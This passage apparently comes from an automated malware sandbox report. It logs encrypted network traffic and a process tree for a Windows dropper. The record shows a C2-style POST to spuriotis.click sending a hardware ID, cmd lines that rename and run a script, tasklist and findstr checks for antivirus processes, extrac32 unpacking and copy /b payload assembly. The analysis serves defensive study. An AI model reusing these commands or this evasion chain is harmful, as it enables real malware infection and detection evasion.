2024-12-28 08:57:13 UTC	15331	OUT	Data Raw: 37 c4 9f 21 55 f9 28 c3 df 34 3e 57 a7 ad cc 1d 9a 9c d3 61 ee 1e fe b6 7a 94 9f 33 64 32 73 ac fe 26 bb 9a 14 2c f8 6e 3b 48 97 50 87 8e 35 01 70 54 07 4c 77 ee ac 88 83 48 ce 31 af 3d 58 3d 6f 26 01 5a 46 54 68 35 f7 ef d3 1e 88 9a 86 7f e7 ee 53 49 2d 90 70 dd fa e2 91 6b 0d 32 5e a6 f7 b7 48 b4 88 d5 37 33 c5 c5 29 22 2b c7 b3 0b fb 2a 1b 9e 17 16 ff b4 46 30 a5 51 19 9f 1b 58 ff 09 c1 c3 d1 f0 09 51 60 c7 fe 00 09 9e 54 54 e9 01 24 e8 94 02 cd a6 bd 76 9b 93 24 23 21 2a b9 c5 02 30 5f dd 1f 0c fa 5a 57 09 53 a4 13 02 10 70 22 e7 c5 93 1a 1f ee 55 0c df 47 da 69 0c 19 74 7b e3 2c 48 d7 c4 5d c6 40 c2 40 86 a7 01 b4 f4 d7 1f 62 19 6e 8e 07 e0 61 fd 21 a6 97 c4 e3 ca 32 49 20 c4 74 94 a6 33 d1 4d fa 08 26 83 b7 86 39 7b 89 7d 79 2f 63 3f ef 1c 79 f3 e4 Data Ascii: 7!U(4>Waz3d2s&,n;HP5pTLwH1=X=o&ZFTh5SI-pk2^H73)"+F0QXQ`TT$v$#!0_ZWSp"UGit{,H]@@bna!2I t3M&9{}y/c?y
2024-12-28 08:57:13 UTC	15331	OUT	Data Raw: 94 97 70 af 58 d1 5e c9 18 9a 3a 02 f2 14 e2 42 bb 5c 36 de cf bd 0c 32 da 95 6a 83 0e 7b d9 a4 3b c6 1d cc 48 b5 cf 8c dc 2f db 6c ab f7 a4 fa 29 a6 5f 49 05 0e 80 0e fe f5 8f 6e 14 31 5b 75 98 79 16 f1 f7 15 4c f2 3c 23 9d 9d cb c2 7b fb 40 bf 56 0b 93 90 75 68 6c 76 2e 70 70 8e ea 42 34 3f a0 4f 0a d5 4b 38 b4 21 28 ca 0b a6 39 c4 94 44 85 d7 5f 08 73 a3 a2 14 63 be f4 ea db bf e4 af 51 1a 6e 43 58 61 a1 98 13 0e 43 55 2f 9f e0 5b 78 75 ca 14 b7 22 23 f9 8e f3 61 bd 32 54 55 66 d6 c1 30 23 7e 6b 0b 78 c6 d8 d1 f3 76 62 7c 38 bc fa e4 0f dd 28 52 07 0b 15 cb 78 b1 c4 c5 82 62 99 52 e1 f5 b3 16 54 55 f4 35 04 a5 79 45 e0 99 24 57 35 48 28 6e dd db 95 09 7a 41 80 00 f7 9d b6 a0 dc 8f 6d 67 35 ed 22 91 1e c1 fa b8 e6 55 6d a6 aa 9a 4a 4e d6 d5 b1 9f b2 ee Data Ascii: pX^:B\62j{;H/l)_In1[uyL<#{@Vuhlv.ppB4?OK8!(9D_scQnCXaCU/[xu"#a2TUf0#~kxvb\|8(RxbRTU5yE$W5H(nzAmg5"UmJN
2024-12-28 08:57:13 UTC	15331	OUT	Data Raw: 8d 0d 69 d6 19 43 bd 3e 9b 05 28 b5 82 a4 4d 18 12 e6 68 81 fa d0 99 e1 ea 66 88 8a 43 24 63 78 ae ef e6 a7 5a be 2e cc fb 0e f2 87 7a 17 07 fc 3c c3 e7 7a 57 ab f6 9e d6 0a 9a fd 4c f6 9b c5 d0 87 cc 39 31 59 a7 1a e9 74 bf 57 fe 6c ee 5d 7f 36 cf 60 6c 56 97 c2 52 27 fe a7 36 b0 97 f8 05 3d ce f6 81 f8 34 31 ca 38 c4 ea b6 21 4f 99 cf 7f 28 2c fd 1d ec 3e 2e fe 71 62 fd 0d 0a b8 0d 0f 0e b0 af 03 79 52 76 75 e4 4c e3 ec 86 23 7d a8 3f 9c d5 ce 42 a0 40 b8 ff f2 c2 b5 8d 08 f7 db 40 af 14 08 0a 02 f7 61 cf 49 04 3c b0 d3 05 1e f8 03 e6 0f 0b dc c2 e3 aa ab b5 8e 85 73 12 20 b2 5c 06 ac 10 f8 7d 3b 67 05 41 3f 6a 35 66 29 65 7e ee 81 e7 63 3f 7b b3 e5 7b ce 95 37 8a cb 9b ac 98 91 ce 89 1f 2e 02 c3 33 04 da 13 c0 ba 1f 0d 3b ef 02 19 7b 1c fe 77 5c ac 73 Data Ascii: iC>(MhfC$cxZ.z<zWL91YtWl]6`lVR'6=418!O(,>.qbyRvuL#}?B@@aI<s \};gA?j5f)e~c?{{7.3;{w\s
2024-12-28 08:57:16 UTC	1135	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:57:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jpel6f0bjos5pmk7g0d6sbj5vq; expires=Wed, 23 Apr 2025 02:43:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PYv7O8eVsUd9srbZxRgfzaOJfUNGIHWx7tMtjD0VRy0l%2BhSkJ%2BLYAskWobh%2BqSmEsnJhsbsNt3vgClLy1fR5YuAYaDdL70YFLEpz0oH8WYi0xrogjoDaxT8ZN%2F%2F6hbPJEVs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90577549744328-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2423&min_rtt=2416&rtt_var=921&sent=325&recv=594&lost=0&retrans=0&sent_bytes=2832&recv_bytes=574429&delivery_rate=1179321&cwnd=220&unsent_bytes=0&cid=4247e5a3aa7303dc&ts=2485&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.12	49728	104.21.2.51	443	6996	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:57:17 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: spuriotis.click
2024-12-28 08:57:17 UTC	80	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d 26 68 77 69 64 3d 38 42 30 35 30 33 44 30 37 37 35 31 30 30 36 37 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 Data Ascii: act=get_message&ver=4.0&lid=5FwhVM--lll&j=&hwid=8B0503D077510067D9AC212D15D33917
2024-12-28 08:57:18 UTC	1131	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:57:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pm01m7n4n6bgf41hmqheac07mq; expires=Wed, 23 Apr 2025 02:43:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o2Q3AHt1bqpb2xxmn4PbKyi%2BMGmy1eM3wObIVLemoquQKd5YHv%2B%2B%2BeDb0h7PpHel0C9bGz4qE4oKOoHWB%2FsPWfbH%2Bie0whhX3qKAc4R3PDbVtuXHuxv5K0%2FVTPIsK6ZxfJc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90578d684a4231-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1741&rtt_var=663&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=979&delivery_rate=1638608&cwnd=127&unsent_bytes=0&cid=7dddf357d2feb4a1&ts=807&x=0"
2024-12-28 08:57:18 UTC	238	IN	Data Raw: 33 36 39 30 0d 0a 54 2f 4a 38 57 38 33 76 34 2b 69 7a 6c 56 7a 4c 71 43 34 4a 5a 6f 4b 49 71 45 47 6e 35 5a 6c 6a 36 67 36 7a 68 31 59 6c 4d 78 34 55 69 56 34 39 75 63 33 5a 32 5a 2b 33 4f 65 6d 53 48 79 56 45 35 71 71 53 59 2f 2f 54 31 44 65 47 61 63 76 53 41 6c 52 64 52 79 53 61 50 68 61 6d 6f 4b 75 77 2f 4d 55 62 6f 4d 31 58 62 52 37 71 79 65 6b 4d 6b 74 33 33 49 4a 70 65 30 76 38 66 61 45 42 4e 5a 4b 55 4a 44 49 6d 35 73 61 66 43 38 53 57 59 37 57 74 77 4e 37 62 73 79 33 57 66 68 4d 74 55 6f 44 33 30 77 68 64 6b 53 6e 41 32 6b 54 63 77 39 4a 32 6d 6a 38 71 6b 64 36 48 74 47 31 41 72 31 4d 32 65 4d 5a 57 76 30 44 4b 2b 52 50 66 76 5a 31 39 5a 5a 6a 2b 36 44 7a 57 75 74 72 4b 70 39 39 6f 36 67 64 39 66 Data Ascii: 3690T/J8W83v4+izlVzLqC4JZoKIqEGn5Zlj6g6zh1YlMx4UiV49uc3Z2Z+3OemSHyVE5qqSY//T1DeGacvSAlRdRySaPhamoKuw/MUboM1XbR7qyekMkt33IJpe0v8faEBNZKUJDIm5safC8SWY7WtwN7bsy3WfhMtUoD30whdkSnA2kTcw9J2mj8qkd6HtG1Ar1M2eMZWv0DK+RPfvZ19ZZj+6DzWutrKp99o6gd9f
2024-12-28 08:57:18 UTC	1369	IN	Data Raw: 57 69 6e 78 32 2b 77 4e 38 6f 66 67 45 34 64 50 79 65 41 45 46 32 63 72 42 4a 6f 35 47 70 57 4d 6f 4b 7a 6d 33 7a 61 54 2f 78 39 71 49 72 53 36 7a 47 72 50 6c 4d 30 4b 6b 6a 76 56 34 51 4a 55 59 6d 77 6f 77 54 51 68 67 61 79 36 33 38 76 4a 63 36 47 66 53 47 51 63 31 2f 72 48 45 50 36 4c 31 42 43 4d 58 39 2b 73 4d 57 52 79 5a 33 79 59 4d 52 43 6d 6d 70 47 70 32 4f 78 75 76 65 52 4c 56 55 6e 48 78 66 34 45 6b 5a 57 72 4b 61 4e 66 35 38 38 53 54 51 4a 4d 49 63 51 4d 41 35 69 42 67 4c 4c 69 31 42 69 45 7a 6d 70 2b 46 39 61 36 32 78 4c 6a 71 63 46 55 70 31 72 66 34 43 35 67 5a 32 38 68 71 78 63 7a 6a 36 4b 49 70 2f 76 4e 46 35 76 76 48 6d 77 66 35 76 44 41 4a 75 61 6f 72 51 43 45 54 63 50 58 4e 31 31 36 55 7a 75 6f 45 79 4f 43 75 4b 65 75 34 64 6f 74 72 38 4a Data Ascii: Winx2+wN8ofgE4dPyeAEF2crBJo5GpWMoKzm3zaT/x9qIrS6zGrPlM0KkjvV4QJUYmwowTQhgay638vJc6GfSGQc1/rHEP6L1BCMX9+sMWRyZ3yYMRCmmpGp2OxuveRLVUnHxf4EkZWrKaNf588STQJMIcQMA5iBgLLi1BiEzmp+F9a62xLjqcFUp1rf4C5gZ28hqxczj6KIp/vNF5vvHmwf5vDAJuaorQCETcPXN116UzuoEyOCuKeu4dotr8J
2024-12-28 08:57:18 UTC	1369	IN	Data Raw: 66 6e 38 63 39 53 32 33 53 2b 79 4f 50 37 54 4f 6b 4a 4c 53 78 75 44 45 67 4b 6d 68 36 47 6c 32 4e 6f 55 6b 2b 64 2b 54 67 33 6e 38 63 77 35 7a 36 54 59 4c 74 38 32 33 63 51 6d 64 56 4a 6d 42 72 38 49 50 61 4b 58 72 4c 2f 33 30 77 36 45 32 55 70 67 4e 63 66 4e 30 52 43 54 67 66 70 58 30 6d 2f 68 73 42 77 57 64 46 73 4f 73 77 59 31 74 49 79 6f 67 34 72 6e 47 61 7a 52 48 79 49 4d 78 37 33 78 44 50 47 67 72 78 50 59 52 50 72 57 41 6d 39 33 64 6e 36 49 46 69 4f 39 70 35 43 47 30 4d 77 4e 69 75 78 68 62 79 7a 31 2b 66 78 7a 31 4c 62 64 4c 37 49 34 2f 74 4d 36 51 6b 74 4c 47 34 4d 53 41 71 61 48 6f 61 58 59 32 68 53 54 35 33 35 4f 44 65 66 78 7a 44 6e 50 70 4e 67 75 33 7a 62 64 78 43 5a 31 55 6d 59 47 76 77 67 39 6f 70 65 73 76 2f 66 54 44 6f 54 5a 53 6d 41 31 Data Ascii: fn8c9S23S+yOP7TOkJLSxuDEgKmh6Gl2NoUk+d+Tg3n8cw5z6TYLt823cQmdVJmBr8IPaKXrL/30w6E2UpgNcfN0RCTgfpX0m/hsBwWdFsOswY1tIyog4rnGazRHyIMx73xDPGgrxPYRPrWAm93dn6IFiO9p5CG0MwNiuxhbyz1+fxz1LbdL7I4/tM6QktLG4MSAqaHoaXY2hST535ODefxzDnPpNgu3zbdxCZ1UmYGvwg9opesv/fTDoTZSmA1
2024-12-28 08:57:18 UTC	1369	IN	Data Raw: 58 67 74 4b 6b 4a 6a 6b 75 43 79 42 6c 57 57 6c 6f 4a 69 41 38 36 6d 59 79 45 69 63 4b 6b 43 4c 50 43 66 45 78 54 38 64 53 48 47 4d 33 53 6f 41 4c 54 59 39 4c 76 45 6b 46 38 54 67 66 4b 4c 42 57 48 6e 4b 57 6e 67 4f 38 49 6d 4a 78 66 66 67 43 78 73 63 31 7a 31 4e 7a 36 4d 71 56 73 2f 66 45 65 53 57 63 72 4c 5a 74 4f 4e 4c 32 6d 69 6f 33 33 6f 57 76 7a 35 6b 51 34 42 4b 6e 5a 38 54 44 31 6a 61 77 5a 68 32 58 6b 31 79 52 67 59 48 4d 59 67 68 59 74 76 74 33 61 6d 39 2f 36 4f 50 2f 4d 63 69 59 4d 35 4f 6d 63 4e 4f 54 64 32 77 6a 59 58 75 44 6b 5a 57 6c 43 64 52 62 42 4f 6a 53 48 67 72 72 65 68 65 59 61 6b 73 5a 6c 62 46 44 34 36 74 42 30 78 4b 50 2f 4a 4c 39 72 79 65 51 4f 45 56 35 48 4a 73 51 79 41 59 71 66 73 34 6e 4c 33 42 47 34 6e 57 64 4f 54 63 37 4d 78 Data Ascii: XgtKkJjkuCyBlWWloJiA86mYyEicKkCLPCfExT8dSHGM3SoALTY9LvEkF8TgfKLBWHnKWngO8ImJxffgCxsc1z1Nz6MqVs/fEeSWcrLZtONL2mio33oWvz5kQ4BKnZ8TD1jawZh2Xk1yRgYHMYghYtvt3am9/6OP/MciYM5OmcNOTd2wjYXuDkZWlCdRbBOjSHgrreheYaksZlbFD46tB0xKP/JL9ryeQOEV5HJsQyAYqfs4nL3BG4nWdOTc7Mx
2024-12-28 08:57:18 UTC	1369	IN	Data Raw: 7a 43 35 31 39 35 63 45 31 64 41 70 39 42 4c 30 79 47 6f 71 6b 6c 5a 69 4b 78 68 69 48 2f 57 78 59 4e 4c 72 42 78 52 54 32 74 71 6b 48 67 58 62 78 79 68 4e 63 59 30 67 37 71 42 63 35 39 5a 71 6e 6b 65 44 73 48 72 72 79 61 6c 30 2f 38 37 2f 2b 43 38 69 53 36 51 65 6d 59 75 62 33 50 6b 52 37 55 42 57 69 46 6d 75 6d 32 4c 43 6a 68 4f 55 49 6e 4d 51 62 4f 7a 50 7a 34 75 4d 47 34 39 58 79 50 38 56 32 33 4f 4e 6d 63 55 46 39 44 6f 74 4d 63 4c 36 35 6a 39 7a 33 6f 57 2b 58 68 33 35 52 4d 64 44 6b 67 77 50 79 30 36 73 76 6b 32 4c 42 7a 79 56 4c 62 7a 45 43 6c 6b 51 7a 72 4c 2b 58 6b 64 75 68 4b 35 2f 63 46 6a 6c 54 38 75 66 38 4c 63 43 66 36 78 65 47 56 39 33 6c 4e 78 4d 46 66 44 66 47 45 32 76 6d 6c 61 43 67 35 74 41 45 2f 38 56 33 59 46 44 4d 30 75 38 78 39 34 Data Ascii: zC5195cE1dAp9BL0yGoqklZiKxhiH/WxYNLrBxRT2tqkHgXbxyhNcY0g7qBc59ZqnkeDsHrryal0/87/+C8iS6QemYub3PkR7UBWiFmum2LCjhOUInMQbOzPz4uMG49XyP8V23ONmcUF9DotMcL65j9z3oW+Xh35RMdDkgwPy06svk2LBzyVLbzEClkQzrL+XkduhK5/cFjlT8uf8LcCf6xeGV93lNxMFfDfGE2vmlaCg5tAE/8V3YFDM0u8x94
2024-12-28 08:57:18 UTC	1369	IN	Data Raw: 66 39 36 7a 4d 32 35 36 53 78 2b 6c 53 41 2b 55 78 4a 4f 44 2b 73 55 54 72 66 4a 65 51 68 44 79 73 66 73 46 36 36 72 4b 49 5a 78 34 34 72 49 44 55 67 74 4b 4c 73 64 58 41 35 32 4e 67 62 2f 5a 30 44 2b 4a 77 32 5a 63 49 39 71 38 78 52 6a 4f 30 39 63 35 72 58 37 6a 35 69 35 73 66 6d 31 36 75 7a 74 77 6e 4c 69 6c 76 50 65 6a 4f 4c 6e 47 47 32 6f 68 34 66 4b 63 4a 64 47 4b 33 42 6d 53 52 39 33 41 45 30 49 4c 64 44 32 63 4e 68 4f 30 70 34 72 66 36 74 73 58 69 73 38 66 50 42 66 49 35 4f 30 45 77 64 54 56 41 70 74 61 36 63 4d 2b 46 45 6c 37 66 70 59 61 45 72 65 35 75 70 7a 31 72 42 76 2f 30 47 55 77 4c 38 76 63 33 48 6a 75 69 2f 56 52 69 31 62 47 30 6d 4a 57 64 55 63 68 74 53 6b 6a 6f 70 75 6b 6a 2f 6a 79 43 2b 44 76 53 33 4d 46 32 73 66 46 4e 75 71 48 38 53 32 Data Ascii: f96zM256Sx+lSA+UxJOD+sUTrfJeQhDysfsF66rKIZx44rIDUgtKLsdXA52Ngb/Z0D+Jw2ZcI9q8xRjO09c5rX7j5i5sfm16uztwnLilvPejOLnGG2oh4fKcJdGK3BmSR93AE0ILdD2cNhO0p4rf6tsXis8fPBfI5O0EwdTVApta6cM+FEl7fpYaEre5upz1rBv/0GUwL8vc3Hjui/VRi1bG0mJWdUchtSkjopukj/jyC+DvS3MF2sfFNuqH8S2
2024-12-28 08:57:18 UTC	1369	IN	Data Raw: 6d 49 58 5a 6b 6f 46 74 68 52 71 74 34 61 37 6f 6f 66 63 43 59 6e 79 47 6c 6b 54 74 4f 62 6b 45 50 43 70 71 56 4c 63 57 2f 44 4d 50 52 59 46 63 43 6a 44 4b 51 2b 2b 73 38 79 77 32 63 38 4f 68 73 4e 68 51 54 37 4e 77 4e 49 77 39 39 50 32 46 59 4a 38 33 50 4e 6a 48 56 31 64 47 36 35 54 63 4f 61 2f 32 35 37 51 7a 42 36 44 79 30 74 4c 55 38 44 41 33 51 7a 42 67 36 30 7a 32 46 66 61 36 43 35 43 41 32 78 39 6f 54 46 73 70 49 69 2f 78 2f 75 73 4b 62 2f 4c 51 45 6f 41 36 74 32 65 65 4e 2b 47 77 53 79 36 56 73 57 32 4d 48 55 43 4b 6e 32 6e 4b 42 47 4a 68 39 4b 53 32 2b 77 4c 73 38 78 36 62 41 48 6b 77 4d 4e 31 34 61 37 4a 41 64 78 4c 30 4c 63 4d 52 77 42 59 4a 4b 63 52 41 72 6e 58 6b 4c 37 71 2b 7a 6d 5a 7a 47 70 6a 55 4e 72 51 35 77 6e 50 6b 36 45 69 6d 6a 66 48 Data Ascii: mIXZkoFthRqt4a7oofcCYnyGlkTtObkEPCpqVLcW/DMPRYFcCjDKQ++s8yw2c8OhsNhQT7NwNIw99P2FYJ83PNjHV1dG65TcOa/257QzB6Dy0tLU8DA3QzBg60z2Ffa6C5CA2x9oTFspIi/x/usKb/LQEoA6t2eeN+GwSy6VsW2MHUCKn2nKBGJh9KS2+wLs8x6bAHkwMN14a7JAdxL0LcMRwBYJKcRArnXkL7q+zmZzGpjUNrQ5wnPk6EimjfH
2024-12-28 08:57:18 UTC	1369	IN	Data Raw: 70 54 47 62 38 49 50 50 79 58 67 6f 37 6e 7a 78 69 6a 2f 30 5a 64 4f 71 32 2b 7a 67 50 4e 73 38 4d 4b 70 45 50 38 72 42 46 30 5a 53 30 32 68 41 30 53 70 72 66 56 70 65 66 6a 5a 4c 6e 77 58 55 55 49 32 73 33 34 45 2b 71 4f 31 69 75 48 4f 6f 44 4e 4d 6b 51 43 53 41 43 32 48 79 71 4c 6f 36 61 48 32 38 4d 55 38 74 67 66 63 53 6a 33 36 63 59 5a 30 49 54 7a 4b 6f 56 6d 69 75 49 59 53 58 5a 6e 48 73 59 59 4f 50 6d 7a 7a 4a 72 69 79 58 4f 41 78 32 31 46 49 39 66 69 78 77 37 69 6f 2f 55 68 68 57 54 63 38 53 52 6d 55 6d 6b 46 6e 7a 55 43 69 4d 53 54 32 76 48 6a 48 72 37 45 5a 6e 31 55 7a 76 44 46 4d 65 2b 57 39 30 69 76 66 2f 65 78 50 6c 46 79 55 79 4f 2f 43 52 53 41 67 59 71 61 32 75 63 73 67 39 4a 47 66 6a 79 7a 2f 50 78 30 7a 62 66 32 4a 70 31 6f 35 76 51 50 63 Data Ascii: pTGb8IPPyXgo7nzxij/0ZdOq2+zgPNs8MKpEP8rBF0ZS02hA0SprfVpefjZLnwXUUI2s34E+qO1iuHOoDNMkQCSAC2HyqLo6aH28MU8tgfcSj36cYZ0ITzKoVmiuIYSXZnHsYYOPmzzJriyXOAx21FI9fixw7io/UhhWTc8SRmUmkFnzUCiMST2vHjHr7EZn1UzvDFMe+W90ivf/exPlFyUyO/CRSAgYqa2ucsg9JGfjyz/Px0zbf2Jp1o5vQPc
2024-12-28 08:57:18 UTC	1369	IN	Data Raw: 46 4f 68 65 30 6c 37 53 43 30 73 38 46 2b 2f 35 71 61 42 61 31 2b 4f 49 47 38 36 75 75 43 34 64 61 32 63 4d 6d 59 51 4e 77 42 73 59 75 4d 6f 6d 6a 31 4b 4c 65 35 41 69 45 32 33 74 5a 4b 73 66 70 35 6a 62 4c 69 4d 4d 32 6a 6e 2f 65 73 54 31 4a 59 56 4d 33 6c 7a 73 63 67 71 4b 73 67 2f 76 57 4f 4c 50 53 56 44 68 51 32 75 6e 6e 65 65 36 7a 33 67 61 37 61 74 61 73 4e 78 5a 61 65 6e 61 63 48 6a 69 37 72 4e 4f 2b 67 75 55 6d 6d 63 70 47 66 77 33 34 32 38 34 64 69 4e 7a 4b 56 61 31 39 35 39 63 68 45 58 68 5a 64 34 6f 67 64 4c 32 38 71 4c 72 33 78 67 37 39 7a 52 78 56 53 63 48 59 2b 43 6a 41 69 4b 67 69 33 6b 66 62 31 32 52 53 43 31 6b 67 6f 79 51 4e 2b 49 57 47 32 4d 66 52 62 4a 7a 48 61 33 67 6a 79 37 47 44 4e 66 47 6a 2b 45 69 76 52 6f 58 54 47 6e 5a 66 57 69 Data Ascii: FOhe0l7SC0s8F+/5qaBa1+OIG86uuC4da2cMmYQNwBsYuMomj1KLe5AiE23tZKsfp5jbLiMM2jn/esT1JYVM3lzscgqKsg/vWOLPSVDhQ2unnee6z3ga7atasNxZaenacHji7rNO+guUmmcpGfw34284diNzKVa1959chEXhZd4ogdL28qLr3xg79zRxVScHY+CjAiKgi3kfb12RSC1kgoyQN+IWG2MfRbJzHa3gjy7GDNfGj+EivRoXTGnZfWi

Target ID:	0
Start time:	03:56:33
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\TNyOrM6mIM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TNyOrM6mIM.exe"
Imagebase:	0x850000
File size:	7'080'960 bytes
MD5 hash:	EC19FA1027FEE164803CC127AEF64199
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:56:34
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\PasoCattle.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
Imagebase:	0x400000
File size:	1'062'983 bytes
MD5 hash:	A3E9A86D6EDE94C3C71D1F7EEA537766
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 11%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:56:35
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Set-up.exe"
Imagebase:	0x5e0000
File size:	6'851'208 bytes
MD5 hash:	2A99036C44C996CEDEB2042D389FE23C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 70%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:56:36
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
Imagebase:	0x1f0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:56:36
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff704000000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:56:37
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xdb0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:56:37
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:56:38
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xdb0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:56:38
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:56:39
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 768400
Imagebase:	0x1f0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:56:40
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Reflect
Imagebase:	0x8c0000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:56:41
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "cocks" Articles
Imagebase:	0x9a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:56:41
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
Imagebase:	0x1f0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:56:42
Start date:	28/12/2024
Path:	C:\Users\user\AppData\Local\Temp\768400\Climb.com
Wow64 process (32bit):	true
Commandline:	Climb.com V
Imagebase:	0xa60000
File size:	947'288 bytes
